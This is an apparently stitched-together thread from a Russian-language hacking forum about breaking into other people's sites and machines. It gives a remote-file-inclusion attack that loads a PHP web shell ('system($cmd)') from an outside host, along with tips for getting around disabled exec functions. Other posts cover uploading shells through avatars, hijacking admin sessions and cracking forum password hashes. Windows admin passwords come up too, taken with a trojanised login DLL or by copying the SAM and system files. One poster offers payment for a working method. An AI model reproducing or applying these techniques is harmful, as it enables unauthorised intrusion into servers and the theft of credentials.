/* сдесь нужно было внутри скобок всё выражение обрамить с обоих сторон " */
header(Location: avatar.gif);
? gt;/* пробела между этими символами быть не должно */
Надо полагать, это просто невнимательность, замаскированная под защиту от дурака
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
для IPB, для входа в админку надо ввести пароль, так что еще скорее всего надо будет расшифровывать md5hash.
Это для IPB v1.x.x Для IPB v2.x.x - не прокатит: там дважды шифруется по md5. У меня как раз аналогичная ситуация: доступ по паролю, да ещё непонятно как зашифровано: явно не md5
Цитата
В твоем случае надо перехватить сессию админа, потом зайти в админку, там есть раздел для загрузки файлов
Это всё понятно: когда-то именно так и делал. Но вопрос несколько другой: вот я могу вместо аватара вставить скрипт. Можно ли этим воспользоваться и вставить шелл-скрипт? По идее он должен выполняться, но у меня не выполнялся... Грузился, но результата работы я не увидел...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
На одном форуме можно указывать в качестве аватара удалённый http-ресурс. При указании этот файл НЕ сохраняется на серваке, а просто указывается его адрес. То есть грузится удалённо. Напрашивается мысль о возможной XSS-атаке. Но я в php не силён. Кто подскажет php-код для этого дела?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Есть некий сайт. На его самописном форуме ссылки на темы имеют вид типа: topic_id=num. Проверил на наличие num.php - существует. При чём тот самый. Далее в браузере ввожу: http://имя_сайта/forum/topic_id=http://www.securitylab.ru Загрузилась главная страница секлаба. Далее: на сайт site.com забрасываю shell.php с таким содержимым: nbsp; nbsp; nbsp;lt;? system($cmd); ? gt; Пишу: http://имя_сайта/forum/topic_id=http://site.com/shell.php cm d=ls получаю в ответ: Warning: system() has been disabled for security reasons in http://site.com/shell.php on line 2
Тогда в файле shell.php заменил cmd на passthru. В ответ: Warning: passthru() has been disabled for security reasons in http://site.com/shell.php on line 1
Попытался подрубить phpshell - уже кем-то написанный. Выдаёт: Warning: exec() has been disabled for security reasons in http://site.com/phpsh.php on line 82
Как быть?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Stan пишет: kto nibud znaet robochiy sposob zalit php shell na 2.0.15 s pravami nobody. WGET nerabotaet, hotya rabotaet esli v /tmp (mogno ego kakto ot tuda skopirovat?) , Cherez bazu output into outfile toge neprohodit, cherez INCLUDE pitalsya neche nesmog. Please pomogite esli est robochiy sposob. srazu poshlu 50 wmz esli rasskagite rabochiy sposob. mogu s protekciey pered informaciey. spasibo badstan@gmail.com
А другие команды пробовал? Может fetch, get, curl, links, lynx помогут? Хотя прежде надо посмотреть: может, прав не хватает (веб-серверу запрещено создавать файлы)? А копировать - команда cp
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Nimda Клавиатурный шпион? Нет, т.к. он загрузится ПОСЛЕ аутентификации юзера. Есть замена стандартной dll отвечающей за аутентификацию: она делает всё что и стандартная + сохраняет набранное в файл. Тока детектится всеми антивирями давно
Но если нужно тока пасс поменять - ERD Commander тебе в помощь
mzzz
Цитата
Во первых, я не думаю, что это получится. Во вторых, что даст нам право к диску? Цель наша - пароль админа.
А почему не должно получиться? А даст это нам возможность скопировать sam и system файлы.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."